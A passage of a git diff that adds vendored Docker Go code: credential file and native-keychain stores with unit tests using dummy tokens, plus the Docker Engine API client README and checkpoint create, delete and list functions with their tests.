+	if a.Auth != "super_secret_token" {
+		t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth)
+	}
+	if a.Email != "foo@example.com" {
+		t.Fatalf("expected email `foo@example.com`, got %s", a.Email)
+	}
+}
+
+func TestFileStoreGet(t *testing.T) {
+	f := newConfigFile(map[string]types.AuthConfig{
+		"https://example.com": {
+			Auth:          "super_secret_token",
+			Email:         "foo@example.com",
+			ServerAddress: "https://example.com",
+		},
+	})
+
+	s := NewFileStore(f)
+	a, err := s.Get("https://example.com")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if a.Auth != "super_secret_token" {
+		t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth)
+	}
+	if a.Email != "foo@example.com" {
+		t.Fatalf("expected email `foo@example.com`, got %s", a.Email)
+	}
+}
+
+func TestFileStoreGetAll(t *testing.T) {
+	s1 := "https://example.com"
+	s2 := "https://example2.com"
+	f := newConfigFile(map[string]types.AuthConfig{
+		s1: {
+			Auth:          "super_secret_token",
+			Email:         "foo@example.com",
+			ServerAddress: "https://example.com",
+		},
+		s2: {
+			Auth:          "super_secret_token2",
+			Email:         "foo@example2.com",
+			ServerAddress: "https://example2.com",
+		},
+	})
+
+	s := NewFileStore(f)
+	as, err := s.GetAll()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(as) != 2 {
+		t.Fatalf("wanted 2, got %d", len(as))
+	}
+	if as[s1].Auth != "super_secret_token" {
+		t.Fatalf("expected auth `super_secret_token`, got %s", as[s1].Auth)
+	}
+	if as[s1].Email != "foo@example.com" {
+		t.Fatalf("expected email `foo@example.com`, got %s", as[s1].Email)
+	}
+	if as[s2].Auth != "super_secret_token2" {
+		t.Fatalf("expected auth `super_secret_token2`, got %s", as[s2].Auth)
+	}
+	if as[s2].Email != "foo@example2.com" {
+		t.Fatalf("expected email `foo@example2.com`, got %s", as[s2].Email)
+	}
+}
+
+func TestFileStoreErase(t *testing.T) {
+	f := newConfigFile(map[string]types.AuthConfig{
+		"https://example.com": {
+			Auth:          "super_secret_token",
+			Email:         "foo@example.com",
+			ServerAddress: "https://example.com",
+		},
+	})
+
+	s := NewFileStore(f)
+	err := s.Erase("https://example.com")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// file store never returns errors, check that the auth config is empty
+	a, err := s.Get("https://example.com")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if a.Auth != "" {
+		t.Fatalf("expected empty auth token, got %s", a.Auth)
+	}
+	if a.Email != "" {
+		t.Fatalf("expected empty email, got %s", a.Email)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go
new file mode 100644
index 0000000000..dec2dbcb82
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go
@@ -0,0 +1,144 @@
+package credentials
+
+import (
+	"github.com/docker/docker-credential-helpers/client"
+	"github.com/docker/docker-credential-helpers/credentials"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cliconfig/configfile"
+)
+
+const (
+	remoteCredentialsPrefix = "docker-credential-"
+	tokenUsername           = "<token>"
+)
+
+// nativeStore implements a credentials store
+// using native keychain to keep credentials secure.
+// It piggybacks into a file store to keep users' emails.
+type nativeStore struct {
+	programFunc client.ProgramFunc
+	fileStore   Store
+}
+
+// NewNativeStore creates a new native store that
+// uses a remote helper program to manage credentials.
+func NewNativeStore(file *configfile.ConfigFile, helperSuffix string) Store {
+	name := remoteCredentialsPrefix + helperSuffix
+	return &nativeStore{
+		programFunc: client.NewShellProgramFunc(name),
+		fileStore:   NewFileStore(file),
+	}
+}
+
+// Erase removes the given credentials from the native store.
+func (c *nativeStore) Erase(serverAddress string) error {
+	if err := client.Erase(c.programFunc, serverAddress); err != nil {
+		return err
+	}
+
+	// Fallback to plain text store to remove email
+	return c.fileStore.Erase(serverAddress)
+}
+
+// Get retrieves credentials for a specific server from the native store.
+func (c *nativeStore) Get(serverAddress string) (types.AuthConfig, error) {
+	// load user email if it exist or an empty auth config.
+	auth, _ := c.fileStore.Get(serverAddress)
+
+	creds, err := c.getCredentialsFromStore(serverAddress)
+	if err != nil {
+		return auth, err
+	}
+	auth.Username = creds.Username
+	auth.IdentityToken = creds.IdentityToken
+	auth.Password = creds.Password
+
+	return auth, nil
+}
+
+// GetAll retrieves all the credentials from the native store.
+func (c *nativeStore) GetAll() (map[string]types.AuthConfig, error) {
+	auths, err := c.listCredentialsInStore()
+	if err != nil {
+		return nil, err
+	}
+
+	// Emails are only stored in the file store.
+	// This call can be safely eliminated when emails are removed.
+	fileConfigs, _ := c.fileStore.GetAll()
+
+	authConfigs := make(map[string]types.AuthConfig)
+	for registry := range auths {
+		creds, err := c.getCredentialsFromStore(registry)
+		if err != nil {
+			return nil, err
+		}
+		ac, _ := fileConfigs[registry] // might contain Email
+		ac.Username = creds.Username
+		ac.Password = creds.Password
+		ac.IdentityToken = creds.IdentityToken
+		authConfigs[registry] = ac
+	}
+
+	return authConfigs, nil
+}
+
+// Store saves the given credentials in the file store.
+func (c *nativeStore) Store(authConfig types.AuthConfig) error {
+	if err := c.storeCredentialsInStore(authConfig); err != nil {
+		return err
+	}
+	authConfig.Username = ""
+	authConfig.Password = ""
+	authConfig.IdentityToken = ""
+
+	// Fallback to old credential in plain text to save only the email
+	return c.fileStore.Store(authConfig)
+}
+
+// storeCredentialsInStore executes the command to store the credentials in the native store.
+func (c *nativeStore) storeCredentialsInStore(config types.AuthConfig) error {
+	creds := &credentials.Credentials{
+		ServerURL: config.ServerAddress,
+		Username:  config.Username,
+		Secret:    config.Password,
+	}
+
+	if config.IdentityToken != "" {
+		creds.Username = tokenUsername
+		creds.Secret = config.IdentityToken
+	}
+
+	return client.Store(c.programFunc, creds)
+}
+
+// getCredentialsFromStore executes the command to get the credentials from the native store.
+func (c *nativeStore) getCredentialsFromStore(serverAddress string) (types.AuthConfig, error) {
+	var ret types.AuthConfig
+
+	creds, err := client.Get(c.programFunc, serverAddress)
+	if err != nil {
+		if credentials.IsErrCredentialsNotFound(err) {
+			// do not return an error if the credentials are not
+			// in the keyckain. Let docker ask for new credentials.
+			return ret, nil
+		}
+		return ret, err
+	}
+
+	if creds.Username == tokenUsername {
+		ret.IdentityToken = creds.Secret
+	} else {
+		ret.Password = creds.Secret
+		ret.Username = creds.Username
+	}
+
+	ret.ServerAddress = serverAddress
+	return ret, nil
+}
+
+// listCredentialsInStore returns a listing of stored credentials as a map of
+// URL -> username.
+func (c *nativeStore) listCredentialsInStore() (map[string]string, error) {
+	return client.List(c.programFunc)
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go
new file mode 100644
index 0000000000..7664faf9e1
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go
@@ -0,0 +1,355 @@
+package credentials
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker-credential-helpers/client"
+	"github.com/docker/docker-credential-helpers/credentials"
+	"github.com/docker/docker/api/types"
+)
+
+const (
+	validServerAddress   = "https://index.docker.io/v1"
+	validServerAddress2  = "https://example.com:5002"
+	invalidServerAddress = "https://foobar.example.com"
+	missingCredsAddress  = "https://missing.docker.io/v1"
+)
+
+var errCommandExited = fmt.Errorf("exited 1")
+
+// mockCommand simulates interactions between the docker client and a remote
+// credentials helper.
+// Unit tests inject this mocked command into the remote to control execution.
+type mockCommand struct {
+	arg   string
+	input io.Reader
+}
+
+// Output returns responses from the remote credentials helper.
+// It mocks those responses based in the input in the mock.
+func (m *mockCommand) Output() ([]byte, error) {
+	in, err := ioutil.ReadAll(m.input)
+	if err != nil {
+		return nil, err
+	}
+	inS := string(in)
+
+	switch m.arg {
+	case "erase":
+		switch inS {
+		case validServerAddress:
+			return nil, nil
+		default:
+			return []byte("program failed"), errCommandExited
+		}
+	case "get":
+		switch inS {
+		case validServerAddress:
+			return []byte(`{"Username": "foo", "Secret": "bar"}`), nil
+		case validServerAddress2:
+			return []byte(`{"Username": "<token>", "Secret": "abcd1234"}`), nil
+		case missingCredsAddress:
+			return []byte(credentials.NewErrCredentialsNotFound().Error()), errCommandExited
+		case invalidServerAddress:
+			return []byte("program failed"), errCommandExited
+		}
+	case "store":
+		var c credentials.Credentials
+		err := json.NewDecoder(strings.NewReader(inS)).Decode(&c)
+		if err != nil {
+			return []byte("program failed"), errCommandExited
+		}
+		switch c.ServerURL {
+		case validServerAddress:
+			return nil, nil
+		default:
+			return []byte("program failed"), errCommandExited
+		}
+	case "list":
+		return []byte(fmt.Sprintf(`{"%s": "%s", "%s": "%s"}`, validServerAddress, "foo", validServerAddress2, "<token>")), nil
+	}
+
+	return []byte(fmt.Sprintf("unknown argument %q with %q", m.arg, inS)), errCommandExited
+}
+
+// Input sets the input to send to a remote credentials helper.
+func (m *mockCommand) Input(in io.Reader) {
+	m.input = in
+}
+
+func mockCommandFn(args ...string) client.Program {
+	return &mockCommand{
+		arg: args[0],
+	}
+}
+
+func TestNativeStoreAddCredentials(t *testing.T) {
+	f := newConfigFile(make(map[string]types.AuthConfig))
+	f.CredentialsStore = "mock"
+
+	s := &nativeStore{
+		programFunc: mockCommandFn,
+		fileStore:   NewFileStore(f),
+	}
+	err := s.Store(types.AuthConfig{
+		Username:      "foo",
+		Password:      "bar",
+		Email:         "foo@example.com",
+		ServerAddress: validServerAddress,
+	})
+
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(f.AuthConfigs) != 1 {
+		t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs))
+	}
+
+	a, ok := f.AuthConfigs[validServerAddress]
+	if !ok {
+		t.Fatalf("expected auth for %s, got %v", validServerAddress, f.AuthConfigs)
+	}
+	if a.Auth != "" {
+		t.Fatalf("expected auth to be empty, got %s", a.Auth)
+	}
+	if a.Username != "" {
+		t.Fatalf("expected username to be empty, got %s", a.Username)
+	}
+	if a.Password != "" {
+		t.Fatalf("expected password to be empty, got %s", a.Password)
+	}
+	if a.IdentityToken != "" {
+		t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken)
+	}
+	if a.Email != "foo@example.com" {
+		t.Fatalf("expected email `foo@example.com`, got %s", a.Email)
+	}
+}
+
+func TestNativeStoreAddInvalidCredentials(t *testing.T) {
+	f := newConfigFile(make(map[string]types.AuthConfig))
+	f.CredentialsStore = "mock"
+
+	s := &nativeStore{
+		programFunc: mockCommandFn,
+		fileStore:   NewFileStore(f),
+	}
+	err := s.Store(types.AuthConfig{
+		Username:      "foo",
+		Password:      "bar",
+		Email:         "foo@example.com",
+		ServerAddress: invalidServerAddress,
+	})
+
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+
+	if !strings.Contains(err.Error(), "program failed") {
+		t.Fatalf("expected `program failed`, got %v", err)
+	}
+
+	if len(f.AuthConfigs) != 0 {
+		t.Fatalf("expected 0 auth config, got %d", len(f.AuthConfigs))
+	}
+}
+
+func TestNativeStoreGet(t *testing.T) {
+	f := newConfigFile(map[string]types.AuthConfig{
+		validServerAddress: {
+			Email: "foo@example.com",
+		},
+	})
+	f.CredentialsStore = "mock"
+
+	s := &nativeStore{
+		programFunc: mockCommandFn,
+		fileStore:   NewFileStore(f),
+	}
+	a, err := s.Get(validServerAddress)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if a.Username != "foo" {
+		t.Fatalf("expected username `foo`, got %s", a.Username)
+	}
+	if a.Password != "bar" {
+		t.Fatalf("expected password `bar`, got %s", a.Password)
+	}
+	if a.IdentityToken != "" {
+		t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken)
+	}
+	if a.Email != "foo@example.com" {
+		t.Fatalf("expected email `foo@example.com`, got %s", a.Email)
+	}
+}
+
+func TestNativeStoreGetIdentityToken(t *testing.T) {
+	f := newConfigFile(map[string]types.AuthConfig{
+		validServerAddress2: {
+			Email: "foo@example2.com",
+		},
+	})
+	f.CredentialsStore = "mock"
+
+	s := &nativeStore{
+		programFunc: mockCommandFn,
+		fileStore:   NewFileStore(f),
+	}
+	a, err := s.Get(validServerAddress2)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if a.Username != "" {
+		t.Fatalf("expected username to be empty, got %s", a.Username)
+	}
+	if a.Password != "" {
+		t.Fatalf("expected password to be empty, got %s", a.Password)
+	}
+	if a.IdentityToken != "abcd1234" {
+		t.Fatalf("expected identity token `abcd1234`, got %s", a.IdentityToken)
+	}
+	if a.Email != "foo@example2.com" {
+		t.Fatalf("expected email `foo@example2.com`, got %s", a.Email)
+	}
+}
+
+func TestNativeStoreGetAll(t *testing.T) {
+	f := newConfigFile(map[string]types.AuthConfig{
+		validServerAddress: {
+			Email: "foo@example.com",
+		},
+	})
+	f.CredentialsStore = "mock"
+
+	s := &nativeStore{
+		programFunc: mockCommandFn,
+		fileStore:   NewFileStore(f),
+	}
+	as, err := s.GetAll()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(as) != 2 {
+		t.Fatalf("wanted 2, got %d", len(as))
+	}
+
+	if as[validServerAddress].Username != "foo" {
+		t.Fatalf("expected username `foo` for %s, got %s", validServerAddress, as[validServerAddress].Username)
+	}
+	if as[validServerAddress].Password != "bar" {
+		t.Fatalf("expected password `bar` for %s, got %s", validServerAddress, as[validServerAddress].Password)
+	}
+	if as[validServerAddress].IdentityToken != "" {
+		t.Fatalf("expected identity to be empty for %s, got %s", validServerAddress, as[validServerAddress].IdentityToken)
+	}
+	if as[validServerAddress].Email != "foo@example.com" {
+		t.Fatalf("expected email `foo@example.com` for %s, got %s", validServerAddress, as[validServerAddress].Email)
+	}
+	if as[validServerAddress2].Username != "" {
+		t.Fatalf("expected username to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Username)
+	}
+	if as[validServerAddress2].Password != "" {
+		t.Fatalf("expected password to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Password)
+	}
+	if as[validServerAddress2].IdentityToken != "abcd1234" {
+		t.Fatalf("expected identity token `abcd1324` for %s, got %s", validServerAddress2, as[validServerAddress2].IdentityToken)
+	}
+	if as[validServerAddress2].Email != "" {
+		t.Fatalf("expected no email for %s, got %s", validServerAddress2, as[validServerAddress2].Email)
+	}
+}
+
+func TestNativeStoreGetMissingCredentials(t *testing.T) {
+	f := newConfigFile(map[string]types.AuthConfig{
+		validServerAddress: {
+			Email: "foo@example.com",
+		},
+	})
+	f.CredentialsStore = "mock"
+
+	s := &nativeStore{
+		programFunc: mockCommandFn,
+		fileStore:   NewFileStore(f),
+	}
+	_, err := s.Get(missingCredsAddress)
+	if err != nil {
+		// missing credentials do not produce an error
+		t.Fatal(err)
+	}
+}
+
+func TestNativeStoreGetInvalidAddress(t *testing.T) {
+	f := newConfigFile(map[string]types.AuthConfig{
+		validServerAddress: {
+			Email: "foo@example.com",
+		},
+	})
+	f.CredentialsStore = "mock"
+
+	s := &nativeStore{
+		programFunc: mockCommandFn,
+		fileStore:   NewFileStore(f),
+	}
+	_, err := s.Get(invalidServerAddress)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+
+	if !strings.Contains(err.Error(), "program failed") {
+		t.Fatalf("expected `program failed`, got %v", err)
+	}
+}
+
+func TestNativeStoreErase(t *testing.T) {
+	f := newConfigFile(map[string]types.AuthConfig{
+		validServerAddress: {
+			Email: "foo@example.com",
+		},
+	})
+	f.CredentialsStore = "mock"
+
+	s := &nativeStore{
+		programFunc: mockCommandFn,
+		fileStore:   NewFileStore(f),
+	}
+	err := s.Erase(validServerAddress)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(f.AuthConfigs) != 0 {
+		t.Fatalf("expected 0 auth configs, got %d", len(f.AuthConfigs))
+	}
+}
+
+func TestNativeStoreEraseInvalidAddress(t *testing.T) {
+	f := newConfigFile(map[string]types.AuthConfig{
+		validServerAddress: {
+			Email: "foo@example.com",
+		},
+	})
+	f.CredentialsStore = "mock"
+
+	s := &nativeStore{
+		programFunc: mockCommandFn,
+		fileStore:   NewFileStore(f),
+	}
+	err := s.Erase(invalidServerAddress)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+
+	if !strings.Contains(err.Error(), "program failed") {
+		t.Fatalf("expected `program failed`, got %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/README.md b/vendor/github.com/docker/docker/client/README.md
new file mode 100644
index 0000000000..059dfb3ce7
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/README.md
@@ -0,0 +1,35 @@
+# Go client for the Docker Engine API
+
+The `docker` command uses this package to communicate with the daemon. It can also be used by your own Go applications to do anything the command-line interface does – running containers, pulling images, managing swarms, etc.
+
+For example, to list running containers (the equivalent of `docker ps`):
+
+```go
+package main
+
+import (
+	"context"
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+)
+
+func main() {
+	cli, err := client.NewEnvClient()
+	if err != nil {
+		panic(err)
+	}
+
+	containers, err := cli.ContainerList(context.Background(), types.ContainerListOptions{})
+	if err != nil {
+		panic(err)
+	}
+
+	for _, container := range containers {
+		fmt.Printf("%s %s\n", container.ID[:10], container.Image)
+	}
+}
+```
+
+[Full documentation is available on GoDoc.](https://godoc.org/github.com/docker/docker/client)
diff --git a/vendor/github.com/docker/docker/client/checkpoint_create.go b/vendor/github.com/docker/docker/client/checkpoint_create.go
new file mode 100644
index 0000000000..0effe498be
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/checkpoint_create.go
@@ -0,0 +1,13 @@
+package client
+
+import (
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// CheckpointCreate creates a checkpoint from the given container with the given name
+func (cli *Client) CheckpointCreate(ctx context.Context, container string, options types.CheckpointCreateOptions) error {
+	resp, err := cli.post(ctx, "/containers/"+container+"/checkpoints", nil, options, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/checkpoint_create_test.go b/vendor/github.com/docker/docker/client/checkpoint_create_test.go
new file mode 100644
index 0000000000..96e5187618
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/checkpoint_create_test.go
@@ -0,0 +1,73 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestCheckpointCreateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	err := client.CheckpointCreate(context.Background(), "nothing", types.CheckpointCreateOptions{
+		CheckpointID: "noting",
+		Exit:         true,
+	})
+
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestCheckpointCreate(t *testing.T) {
+	expectedContainerID := "container_id"
+	expectedCheckpointID := "checkpoint_id"
+	expectedURL := "/containers/container_id/checkpoints"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+
+			createOptions := &types.CheckpointCreateOptions{}
+			if err := json.NewDecoder(req.Body).Decode(createOptions); err != nil {
+				return nil, err
+			}
+
+			if createOptions.CheckpointID != expectedCheckpointID {
+				return nil, fmt.Errorf("expected CheckpointID to be 'checkpoint_id', got %v", createOptions.CheckpointID)
+			}
+
+			if !createOptions.Exit {
+				return nil, fmt.Errorf("expected Exit to be true")
+			}
+
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.CheckpointCreate(context.Background(), expectedContainerID, types.CheckpointCreateOptions{
+		CheckpointID: expectedCheckpointID,
+		Exit:         true,
+	})
+
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete.go b/vendor/github.com/docker/docker/client/checkpoint_delete.go
new file mode 100644
index 0000000000..e6e75588b1
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/checkpoint_delete.go
@@ -0,0 +1,20 @@
+package client
+
+import (
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// CheckpointDelete deletes the checkpoint with the given name from the given container
+func (cli *Client) CheckpointDelete(ctx context.Context, containerID string, options types.CheckpointDeleteOptions) error {
+	query := url.Values{}
+	if options.CheckpointDir != "" {
+		query.Set("dir", options.CheckpointDir)
+	}
+
+	resp, err := cli.delete(ctx, "/containers/"+containerID+"/checkpoints/"+options.CheckpointID, query, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete_test.go b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go
new file mode 100644
index 0000000000..a78b050487
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go
@@ -0,0 +1,54 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestCheckpointDeleteError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.CheckpointDelete(context.Background(), "container_id", types.CheckpointDeleteOptions{
+		CheckpointID: "checkpoint_id",
+	})
+
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestCheckpointDelete(t *testing.T) {
+	expectedURL := "/containers/container_id/checkpoints/checkpoint_id"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "DELETE" {
+				return nil, fmt.Errorf("expected DELETE method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.CheckpointDelete(context.Background(), "container_id", types.CheckpointDeleteOptions{
+		CheckpointID: "checkpoint_id",
+	})
+
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/checkpoint_list.go b/vendor/github.com/docker/docker/client/checkpoint_list.go
new file mode 100644
index 0000000000..8eb720a6b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/checkpoint_list.go
@@ -0,0 +1,28 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// CheckpointList returns the volumes configured in the docker host.
+func (cli *Client) CheckpointList(ctx context.Context, container string, options types.CheckpointListOptions) ([]types.Checkpoint, error) {
+	var checkpoints []types.Checkpoint
+
+	query := url.Values{}
+	if options.CheckpointDir != "" {
+		query.Set("dir", options.CheckpointDir)
+	}
+
+	resp, err := cli.get(ctx, "/containers/"+container+"/checkpoints", query, nil)
+	if err != nil {
+		return checkpoints, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&checkpoints)
+	ensureReaderClosed(resp)
+	return checkpoints, err
+}
diff --git a/vendor/github.com/docker/docker/client/checkpoint_list_test.go b/vendor/github.com/docker/docker/client/checkpoint_list_test.go
new file mode 100644
index 0000000000..6c90f61e8c
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/checkpoint_list_test.go
@@ -0,0 +1,57 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestCheckpointListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.CheckpointList(context.Background(), "container_id", types.CheckpointListOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestCheckpointList(t *testing.T) {
+	expectedURL := "/containers/container_id/checkpoints"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal([]types.Checkpoint{
+				{
+					Name: "checkpoint",
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	checkpoints, err := client.CheckpointList(context.Background(), "container_id", types.CheckpointListOptions{})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(checkpoints) != 1 {
+		t.Fatalf("expected 1 checkpoint, got %v", checkpoints)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/client.go b/vendor/github.com/docker/docker/client/client.go
new file mode 100644
index 0000000000..a9bdab6bb6
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/client.go
@@ -0,0 +1,246 @@
+/*
+Package client is a Go client for the Docker Engine API.
+
+The "docker" command uses this package to communicate with the daemon. It can also
+be used by your own Go applications to do anything the command-line interface does
+– running containers, pulling images, managing swarms, etc.
+
+For more information about the Engine API, see the documentation:
+https://docs.docker.com/engine/reference/api/
+
+Usage
+
+You use the library by creating a client object and calling methods on it. The
+client can be created either from environment variables with NewEnvClient, or
+configured manually with NewClient.
+
+For example, to list running containers (the equivalent of "docker ps"):
+
+	package main
+
+	import (
+		"context"
+		"fmt"
+
+		"github.com/docker/docker/api/types"
+		"github.com/docker/docker/client"
+	)
+
+	func main() {
+		cli, err := client.NewEnvClient()
+		if err != nil {
+			panic(err)
+		}
+
+		containers, err := cli.ContainerList(context.Background(), types.ContainerListOptions{})
+		if err != nil {
+			panic(err)
+		}
+
+		for _, container := range containers {
+			fmt.Printf("%s %s\n", container.ID[:10], container.Image)
+		}
+	}
+
+*/
+package client
+
+import (
+	"fmt"
+	"net/http"
+	"net/url"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/go-connections/sockets"
+	"github.com/docker/go-connections/tlsconfig"
+)
+
+// DefaultVersion is the version of the current stable API
+const DefaultVersion string = "1.25"
+
+// Client is the API client that performs all operations
+// against a docker server.
+type Client struct {
+	// scheme sets the scheme for the client
+	scheme string
+	// host holds the server address to connect to
+	host string
+	// proto holds the client protocol i.e. unix.
+	proto string
+	// addr holds the client address.
+	addr string
+	// basePath holds the path to prepend to the requests.
+	basePath string
+	// client used to send and receive http requests.
+	client *http.Client
+	// version of the server to talk to.
+	version string
+	// custom http headers configured by users.
+	customHTTPHeaders map[string]string
+	// manualOverride is set to true when the version was set by users.
+	manualOverride bool
+}
+
+// NewEnvClient initializes a new API client based on environment variables.
+// Use DOCKER_HOST to set the url to the docker server.
+// Use DOCKER_API_VERSION to set the version of the API to reach, leave empty for latest.
+// Use DOCKER_CERT_PATH to load the tls certificates from.
+// Use DOCKER_TLS_VERIFY to enable or disable TLS verification, off by default.
+func NewEnvClient() (*Client, error) {
+	var client *http.Client
+	if dockerCertPath := os.Getenv("DOCKER_CERT_PATH"); dockerCertPath != "" {
+		options := tlsconfig.Options{
+			CAFile:             filepath.Join(dockerCertPath, "ca.pem"),
+			CertFile:           filepath.Join(dockerCertPath, "cert.pem"),
+			KeyFile:            filepath.Join(dockerCertPath, "key.pem"),
+			InsecureSkipVerify: os.Getenv("DOCKER_TLS_VERIFY") == "",
+		}
+		tlsc, err := tlsconfig.Client(options)
+		if err != nil {
+			return nil, err
+		}
+
+		client = &http.Client{
+			Transport: &http.Transport{
+				TLSClientConfig: tlsc,
+			},
+		}
+	}
+
+	host := os.Getenv("DOCKER_HOST")
+	if host == "" {
+		host = DefaultDockerHost
+	}
+	version := os.Getenv("DOCKER_API_VERSION")
+	if version == "" {
+		version = DefaultVersion
+	}
+
+	cli, err := NewClient(host, version, client, nil)
+	if err != nil {
+		return cli, err
+	}
+	if os.Getenv("DOCKER_API_VERSION") != "" {
+		cli.manualOverride = true
+	}
+	return cli, nil
+}
+
+// NewClient initializes a new API client for the given host and API version.
+// It uses the given http client as transport.
+// It also initializes the custom http headers to add to each request.
+//
+// It won't send any version information if the version number is empty. It is
+// highly recommended that you set a version or your client may break if the
+// server is upgraded.
+func NewClient(host string, version string, client *http.Client, httpHeaders map[string]string) (*Client, error) {
+	proto, addr, basePath, err := ParseHost(host)
+	if err != nil {
+		return nil, err
+	}
+
+	if client != nil {
+		if _, ok := client.Transport.(*http.Transport); !ok {
+			return nil, fmt.Errorf("unable to verify TLS configuration, invalid transport %v", client.Transport)
+		}
+	} else {
+		transport := new(http.Transport)
+		sockets.ConfigureTransport(transport, proto, addr)
+		client = &http.Client{
+			Transport: transport,
+		}
+	}
+
+	scheme := "http"
+	tlsConfig := resolveTLSConfig(client.Transport)
+	if tlsConfig != nil {
+		// TODO(stevvooe): This isn't really the right way to write clients in Go.
+		// `NewClient` should probably only take an `*http.Client` and work from there.
+		// Unfortunately, the model of having a host-ish/url-thingy as the connection
+		// string has us confusing protocol and transport layers. We continue doing
+		// this to avoid breaking existing clients but this should be addressed.
+		scheme = "https"
+	}
+
+	return &Client{
+		scheme:            scheme,
+		host:              host,
